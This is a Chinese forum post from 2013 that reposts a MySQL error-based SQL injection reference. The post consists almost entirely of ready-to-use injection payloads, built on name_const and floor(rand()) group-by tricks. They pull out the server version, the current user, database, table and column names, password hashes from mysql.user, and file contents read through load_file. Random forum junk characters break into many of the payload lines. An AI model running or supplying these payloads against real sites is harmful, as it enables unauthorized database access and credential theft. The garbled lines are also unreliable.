Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑

/ s; f8 ~+ j) p2 G5 Q7 E
Mysql暴错注入参考（pdf），每天一贴。。。
( ^; V8 R8 g. l# Y, f
7 v) B) V$ c( ?MySql Error Based Injection Reference
' v. d$ i: [2 R! Q# b[Mysql暴错注入参考]
Authornig0s1992
' w* R. u+ a+ }- ?Blog:http://pnig0s1992.blog.51cto.com/
% |8 g) W+ k- c. ]# K% ZTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
查询当前用户:
7 w# W. z" n; z: g8 vMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
7 F. z; }5 [3 R; ZMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
' I# t* [' O7 a" a查询当前数据库:
9 P; g6 V8 p3 J6 }  S$ P: J: OMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
4 k5 u$ z6 f3 h: k7 G& @7 nMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
7 D- R, a+ L* b# i3 uor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
, w' J5 Z% T$ j) m/ {& yLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
- h! P  {4 E; A9 i2 ?4 t; c爆指定库数目:
" H: {2 B  E+ l5 oand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
/ H4 l  p6 N7 r! H3 ]+by+x)a)+and+1=1 0x6D7973716C=mysql
+ S, V- f# v% j7 j2 W5 r$ W; J依次爆表:
! u$ G0 B2 T5 O& j( land+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
$ b0 m+ B4 e* D! h* m) e! gable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
& V! O* I! t) d' Z5 N- k& p3 H爆表内字段数目:
' n1 d( d8 Q! g" b/ T2 {and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
  C, d7 A. e8 ^1 J1 H, L1 t9 V+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
. X  W: H2 V+ G# z% V" e0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
  o+ {: c8 h) D$ J) ]! |loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
$ x% D+ |! _- y  v- C1 a依次暴内容:
0 V/ S3 o4 E" D( _$ A5 P, f' h  q* ]( jand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
3 O5 E4 R% o4 d, M将n顺序替换
+ i6 E8 Q! p9 f. B3 o' `7 \6 O0 `爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
; U& p6 k, J0 \9 O; g( G4 F% B& mThx for reading.

' u% J; C& c0 Y" E- r  _$ j! K不要下载也可以，
6 m8 I* q+ o0 _8 n, N+ B" W" U  O